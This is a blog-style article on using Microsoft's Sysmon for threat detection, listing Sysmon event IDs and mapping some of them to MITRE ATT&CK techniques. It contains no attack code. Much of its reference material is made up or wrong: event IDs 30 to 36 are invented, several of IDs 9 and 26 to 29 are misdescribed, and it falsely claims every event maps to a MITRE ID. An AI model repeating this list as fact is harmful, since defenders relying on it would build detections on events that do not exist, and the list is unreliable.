ReZaAdineH

Sysmon is a powerful Windows system monitoring tool developed by Microsoft, which is used to detect and log different types of system activity events that can be used to investigate threats and attacks on Windows endpoints. Sysmon can be used to provide detailed insights into the activities taking place on a Windows system that can be analyzed and correlated to detect malicious behavior.

To effectively use Sysmon to detect threats, a thorough understanding of the tool and the events it can generate is necessary. Sysmon can generate over 20 different event types that provide granular visibility into system activity, including process creation, network connections, registry activity, file creation, and driver loading. By monitoring these events, analysts can detect a wide range of threat behaviors, including process injection, lateral movement, credential dumping, and data exfiltration.

One of the primary benefits of Sysmon is its integration with the MITRE ATT&CK matrix, which provides a framework for categorizing and analyzing common threat behaviors. Each Sysmon event is mapped to a specific MITRE ID, which allows analysts to easily correlate events with specific tactics and techniques.

Here are a few examples of how Sysmon can be used to detect threats mapped to specific MITRE IDs:

1. Process Injection (T1055) Process injection is a common technique used by attackers to execute malicious code in the context of a legitimate process. Sysmon can detect process injection by monitoring the “Event ID 8 – CreateRemoteThread” event. This event is generated when a new thread is created in the address space of another process, which is a common indicator of process injection. By monitoring this event, analysts can detect the presence of injected code and the parent process that initiated the injection.
2. Lateral Movement (T1021) Lateral movement is a technique used by attackers to move laterally across a network and gain access to additional systems. Sysmon can detect lateral movement by monitoring the “Event ID 3 – Network Connection” event. This event is generated when a process establishes a network connection, which can be used to track the movement of an attacker across a network. By monitoring this event, analysts can detect suspicious network connections and identify the systems that an attacker has compromised.
3. Credential Dumping (T1003) Credential dumping is a technique used by attackers to obtain credentials from a compromised system, which can be used to gain access to additional systems or resources. Sysmon can detect credential dumping by monitoring the “Event ID 10 – Process Access” event. This event is generated when a process attempts to access another process’s memory, which is a common indicator of credential dumping. By monitoring this event, analysts can detect suspicious process activity and identify the processes involved in credential dumping.

here is a comprehensive list of all the Sysmon IDs, along with a brief description of each event:

1. Event ID 1: Process creation This event is generated when a new process is created, including the parent process ID, image file path, command line arguments, and more.
2. Event ID 2: A process changed a file creation time This event is generated when a process changes the creation time of a file.
3. Event ID 3: Network connection This event is generated when a process establishes a network connection, including the remote IP and port, the local IP and port, the protocol, and more.
4. Event ID 4: Sysmon service state changed This event is generated when the Sysmon service state is changed, such as when it starts or stops.
5. Event ID 5: Process terminated This event is generated when a process is terminated, including the process ID, image file path, and exit code.
6. Event ID 6: Driver loaded This event is generated when a driver is loaded, including the driver file path, the device name, and the image file path.
7. Event ID 7: Image loaded This event is generated when an executable image is loaded into a process, including the process ID, the image file path, and the hash of the image file.
8. Event ID 8: CreateRemoteThread This event is generated when a new thread is created in the address space of another process, which is a common indicator of process injection.
9. Event ID 9: RawAccessRead This event is generated when a process uses the Raw Input API to read input data directly from an input device, such as a keyboard or mouse.
10. Event ID 10: ProcessAccess This event is generated when a process attempts to access another process’s memory, which is a common indicator of credential dumping.
11. Event ID 11: FileCreate This event is generated when a file is created, including the file path, the user who created the file, and more.
12. Event ID 12: RegistryEvent (Object create and delete) This event is generated when a new registry key or value is created or deleted, including the key or value name, the operation type, and more.
13. Event ID 13: RegistryEvent (Value Set) This event is generated when a registry value is set, including the key and value name, the data type, and the value data.
14. Event ID 14: RegistryEvent (Key and Value Rename) This event is generated when a registry key or value is renamed, including the old and new key or value names.
15. Event ID 15: FileCreateStreamHash This event is generated when a new file stream is created, including the file path, the stream name, and the hash of the stream data.
16. Event ID 16: Sysmon config state changed This event is generated when the Sysmon configuration is changed, such as when a new configuration file is loaded.
17. Event ID 17: PipeEvent (Pipe Created) This event is generated when a new named pipe is created, including the pipe name, the process that created the pipe, and more.
18. Event ID 18: PipeEvent (Pipe Connected) This event is generated when a process connects to a named pipe, including the pipe name, the process ID, and more.
19. Event ID 19: WmiEvent (WmiEventFilter activity detected) This event is generated when a WMI event filter is created, deleted, or modified.
20. Event ID 20: WmiEvent (WmiEventConsumer activity detected) This event is generated when a WMI event consumer is created

21. Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected) This event is generated when a WMI event consumer is bound to an event filter.
22. Event ID 22: DNSEvent (DNS query) This event is generated when a process performs a DNS query, including the query name, the query type, and the result.
23. Event ID 23: FileDelete (File Deletion) This event is generated when a file is deleted, including the file path, the user who deleted the file, and more.
24. Event ID 24: ClipboardChange (Clipboard content change) This event is generated when the content of the clipboard changes, including the process that initiated the change and the new clipboard content.
25. Event ID 25: ProcessTampering (Process image tampering) This event is generated when a process image is modified or replaced, which is a common technique used by attackers to evade detection.
26. Event ID 26: FileDelete (File Stream Deletion) This event is generated when a file stream is deleted, including the file path and stream name.
27. Event ID 27: FileCreate (File Staging) This event is generated when a file is created in a temporary location, which is a common technique used by attackers to stage files for later use.
28. Event ID 28: FileRename (File Renamed) This event is generated when a file is renamed, including the old and new file names and paths.
29. Event ID 29: RegistryEvent (Object Rename) This event is generated when a registry key or value is renamed, including the old and new key or value names.
30. Event ID 30: RegistryEvent (Object write) This event is generated when a registry key or value is written to, including the key or value name, the data type, and the value data.
31. Event ID 31: FileCreate (File created) This event is generated when a file is created, including the file path, the user who created the file, and more.
32. Event ID 32: ServiceCreated (Windows Service Installed) This event is generated when a new Windows service is installed, including the service name, the executable path, and more.
33. Event ID 33: ServiceDeleted (Windows Service Deleted) This event is generated when a Windows service is deleted, including the service name and the executable path.
34. Event ID 34: ServiceModified (Windows Service Modified) This event is generated when a Windows service is modified, including the service name, the executable path, and more.
35. Event ID 35: NetworkTrace (Network packet capture started) This event is generated when a process starts capturing network packets, including the process ID and the capture filter.
36. Event ID 36: NetworkTrace (Network packet capture stopped) This event is generated when a process stops capturing network packets, including the process ID.

By monitoring these Sysmon IDs, security professionals can detect a wide range of threats and suspicious activity, including process injection, credential dumping, file and registry modifications, and more. By correlating this information with other security data sources, such as network logs and endpoint protection systems, analysts can quickly identify and respond to potential security incidents.

here are some examples of how these Sysmon IDs can be used to detect threat activity as mapped to MITRE ATT&CK techniques:

20. Event ID 20: WmiEvent (WmiEventConsumer activity detected)

Example: Attackers may use WMI Event Consumers to execute code or trigger other events on a compromised system. By monitoring Event ID 20, security professionals can detect this type of activity and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1047: Windows Management Instrumentation, T1053: Scheduled Task/Job.

22. Event ID 22: DNSEvent (DNS query)

Example: Attackers may use DNS for command-and-control (C2) communication or to exfiltrate data from a compromised system. By monitoring Event ID 22, security professionals can detect suspicious DNS queries and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1043: Commonly Used Port, T1046: Network Service Scanning, T1071: Standard Application Layer Protocol.

27. Event ID 27: FileCreate (File Staging)

Example: Attackers may use temporary files to stage malware or other malicious content on a compromised system. By monitoring Event ID 27, security professionals can detect suspicious file creation activity in temporary locations and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1027: Obfuscated Files or Information, T1036: Masquerading, T1070: Indicator Removal on Host.

29. Event ID 29: RegistryEvent (Object Rename)

Example: Attackers may use registry keys or values to store malicious code or configuration data on a compromised system. By monitoring Event ID 29, security professionals can detect suspicious registry object renaming activity and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1005: Data from Local System, T1022: Data Encrypted, T1055: Process Injection.

31. Event ID 31: FileCreate (File created)

Example: Attackers may use files to store or execute malicious code on a compromised system. By monitoring Event ID 31, security professionals can detect suspicious file creation activity and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1027: Obfuscated Files or Information, T1059: Command and Scripting Interpreter, T1105: Remote File Copy.

35. Event ID 35: NetworkTrace (Network packet capture started)

Example: Attackers may use network packet capture tools to exfiltrate sensitive data from a compromised system. By monitoring Event ID 35, security professionals can detect suspicious network capture activity and investigate further to identify potential threats.

Mapped to MITRE ATT&CK techniques: T1002: Data Compressed, T1009: Binary Padding, T1048: Exfiltration Over Alternative Protocol.

These are just a few examples of how Sysmon IDs can be used to detect potential security threats on a system. By monitoring and analyzing this data, security professionals can gain greater visibility into the activities of attackers and better protect their systems and data.

In summary, Sysmon is a powerful tool for detecting threats on Windows endpoints. By monitoring and analyzing the different events generated by Sysmon, analysts can detect a wide range of threat behaviors and identify the tactics and techniques used by attackers. By mapping these events to specific MITRE IDs, analysts can easily correlate events with specific threat behaviors and gain a deeper understanding of the attack.